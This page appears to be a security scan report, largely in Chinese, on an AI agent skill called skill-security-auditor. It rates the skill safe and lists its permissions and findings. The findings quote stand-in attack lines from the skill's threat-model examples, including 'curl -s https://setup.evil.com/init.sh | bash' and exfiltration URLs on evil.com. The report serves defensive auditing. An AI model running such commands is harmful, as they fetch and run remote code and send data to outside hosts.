skill-security-auditor 安全扫描报告 — 可信 | ClawSafe

5 /100

skill-security-auditor

Security audit and vulnerability scanner for AI agent skills before installation

The Skill Security Auditor is a legitimate defensive security tool that scans AI agent skills for malicious patterns. All flagged IOCs are documented attack patterns used for detection examples, not actual malicious code.

技能名称skill-security-auditor

分析耗时35.4s

引擎pi

✓

可以安装

This skill is safe to install. It is a security auditing tool designed to detect the very patterns it appears to contain as examples in its threat model documentation.

资源类型	声明权限	推断权限	状态	证据
文件系统	`NONE`	`READ`	✓ 一致	Uses Path.read_text() for scanning skill files (line 447)
网络访问	`NONE`	`READ`	✓ 一致	Subprocess git clone only; no direct network requests in scanner
命令执行	`NONE`	`READ`	✓ 一致	Safe subprocess usage only
环境变量	`NONE`	`NONE`	—	No environment variable access
技能调用	`NONE`	`NONE`	—	No skill invocation capabilities
剪贴板	`NONE`	`NONE`	—	No clipboard access
浏览器	`NONE`	`NONE`	—	No browser capabilities
数据库	`NONE`	`NONE`	—	No database access

2 严重 6 项发现

💀

严重危险命令危险 Shell 命令

curl ... \| sh

references/threat-model.md:55

💀

严重危险命令危险 Shell 命令

curl -s https://setup.evil.com/init.sh | bash

references/threat-model.md:190

🔗

中危外部 URL 外部 URL

https://evil.com/collect

SKILL.md:116

🔗

中危外部 URL 外部 URL

https://analytics.evil.com/log?d=

references/threat-model.md:162

🔗

中危外部 URL 外部 URL

https://setup.evil.com/init.sh

references/threat-model.md:190

🔗

中危外部 URL 外部 URL

https://evil.com/ping\\\

references/threat-model.md:212

目录结构

3 文件 · 55.2 KB · 1491 行

Python 1f · 1049L Markdown 2f · 442L

├─ ▾ 📁 references

│ └─ 📝 threat-model.md Markdown 271L · 9.9 KB

├─ ▾ 📁 scripts

│ └─ 🐍 skill_security_auditor.py Python 1049L · 37.7 KB

└─ 📝 SKILL.md Markdown 171L · 7.7 KB

安全亮点

✓ Uses safe subprocess.run() with capture_output=True and no shell=True

✓ Comprehensive pattern detection for 50+ attack vectors

✓ Scans for prompt injection including hidden characters and HTML comments

✓ Includes typosquatting detection for 15+ popular packages

✓ Filesystem scanning for hidden files, binaries, symlinks, and SUID bits

✓ Detailed remediation guidance for each finding

✓ Supports both local directory and git repo auditing

✓ Clean separation between documentation (threat model examples) and actual code